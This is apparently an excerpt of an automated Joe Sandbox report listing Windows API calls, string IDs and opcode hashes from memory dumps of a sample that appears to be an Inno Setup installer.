                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1452528299-0
                                                                                            • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                            • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                                            • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                            • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                                            APIs
                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00003EBC,00007EBF,00401973), ref: 00401766
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                            • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                            • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                            • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                            • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                            • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                            • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                            • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                            • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                            • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                            • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                            Similarity
                                                                                            • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                            • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                            • API String ID: 2323315520-3614243559
                                                                                            • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                            • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                                            • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                            • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 0045862F
                                                                                            • QueryPerformanceCounter.KERNEL32(02113858,00000000,004588C2,?,?,02113858,00000000,?,00458FBE,?,02113858,00000000), ref: 00458638
                                                                                            • GetSystemTimeAsFileTime.KERNEL32(02113858,02113858), ref: 00458642
                                                                                            • GetCurrentProcessId.KERNEL32(?,02113858,00000000,004588C2,?,?,02113858,00000000,?,00458FBE,?,02113858,00000000), ref: 0045864B
                                                                                            • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02113858,02113858), ref: 004586CF
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                            • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Similarity
                                                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                            • API String ID: 770386003-3271284199
                                                                                            • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                            • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                            • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                            • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                            APIs
                                                                                              • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02112BDC,?,?,?,02112BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                              • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                              • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BDC,?,?,?,02112BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                              • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BDC,?,?,?,02112BDC), ref: 004783CC
                                                                                              • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,02112BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                              • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,02112BDC,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                            • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                            • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                            • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                            Similarity
                                                                                            • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                            • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                            • API String ID: 883996979-221126205
                                                                                            • Opcode ID: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                            • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                            • Opcode Fuzzy Hash: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                            • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                            • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                            Similarity
                                                                                            • API ID: MessageSendShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1631623395-0
                                                                                            • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                            • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                            • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                            • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00418393
                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                            • GetWindowRect.USER32(?), ref: 004183CC
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                            • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                            • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                            Similarity
                                                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                            • String ID: ,
                                                                                            • API String ID: 2266315723-3772416878
                                                                                            • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                            • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                            • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                            • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                            • String ID: SeShutdownPrivilege
                                                                                            • API String ID: 107509674-3733053543
                                                                                            • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                            • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                            • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                            • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                                                            • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CryptVersion
                                                                                            • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                            • API String ID: 1951258720-508647305
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
• SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
• FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
• FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
Similarity
• API ID: FileFind$AttributesCloseFirstNext
• String ID: isRS-$isRS-???.tmp
• API String ID: 134685335-3422211394
APIs
• PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
• PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
• SetForegroundWindow.USER32(?), ref: 00457649
• NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
Strings
• Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
Similarity
• API ID: MessagePostWindow$ForegroundNtdllProc_
• String ID: Cannot evaluate variable because [Code] isn't running yet
• API String ID: 2236967946-3182603685
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
APIs
• IsIconic.USER32(?), ref: 00417D0F
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
• GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
• SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
Similarity
• API ID: Window$Placement$Iconic
• String ID: ,
• API String ID: 568898626-3772416878
APIs
• SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
• FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
• FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
• FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
APIs
• SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
• FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
• FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
• FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
• DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
• GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
• SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
Similarity
• API ID: ErrorLast$CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 1177325624-0
APIs
• IsIconic.USER32(?), ref: 0048397A
• GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
• ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
• ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
Similarity
• API ID: Window$Show$IconicLong
• String ID:
• API String ID: 2754861897-0
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
• FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
• FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 3541575487-0
                                                                                            • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                            • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                                                            • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                            • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 004241E4
                                                                                            • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                                              • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                              • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021125AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                                                            • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveFocusIconicShow
                                                                                            • String ID:
                                                                                            • API String ID: 649377781-0
                                                                                            • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                            • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                                            • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                            • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00417D0F
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Placement$Iconic
                                                                                            • String ID:
                                                                                            • API String ID: 568898626-0
                                                                                            • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                            • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                                            • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                            • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CaptureIconic
                                                                                            • String ID:
                                                                                            • API String ID: 2277910766-0
                                                                                            • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                            • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                                            • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                            • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 0042419B
                                                                                              • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                              • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                              • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                              • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                            • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                              • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                            • String ID:
                                                                                            • API String ID: 2671590913-0
                                                                                            • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                            • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
